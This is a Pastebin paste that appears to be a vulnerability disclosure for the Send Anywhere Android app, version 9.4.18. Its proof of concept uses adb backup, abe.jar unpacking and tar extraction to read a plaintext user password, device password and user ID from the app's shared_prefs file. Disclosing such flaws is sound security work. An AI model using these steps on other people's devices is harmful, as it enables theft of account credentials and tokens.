API tools faq
paste
Advertisement
Guest User

Send Anywhere

a guest
Jun 14th, 2019
6,144
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.96 KB | None | 0 0
raw download clone embed print report
  1. #Application: Send Anywhere
  2. #Platform: Android
  3. #Version: 9.4.18
  4. #Severity: Medium
  5. #Author: Loc Phan Van
  6. #Impact: non-root user to find out the username/password of a valid user and user's access token via shared_prefs folder
  7.  
  8. POC:
  9.  
  10. 1. Backup the application
  11. adb backup -f ~/sendanywhere.ab -noapk com.estmob.android.sendanywhere
  12.  
  13.  
  14. 2. Convert file sendanywhere.ab to sendanywhere.tar
  15. java -jar abe.jar unpack ~/sendanywhere.ab sendanywhere.tar ""
  16.  
  17. 3. Extract file
  18. tar -xvf sendanywhere.tar
  19.  
  20. 4. Look for user's credentials in /shared_prefs/sendanywhere_device.xml
  21.  
  22. <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
  23.  
  24. <map>
  25.  
  26. <string name="user_password">P4ssw0rd123</string>
  27.  
  28. <string name="device_id">1020427653131</string>
  29.  
  30. <string name="device_password">J6h49M5JXZw5w</string>
  31.  
  32. <string name="user_id">[email protected]</string>
  33.  
  34. <string name="advertising_id">5cfc8beb-f3ff-4b0a-a408-f5059c412d82</string>
  35.  
  36. </map>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!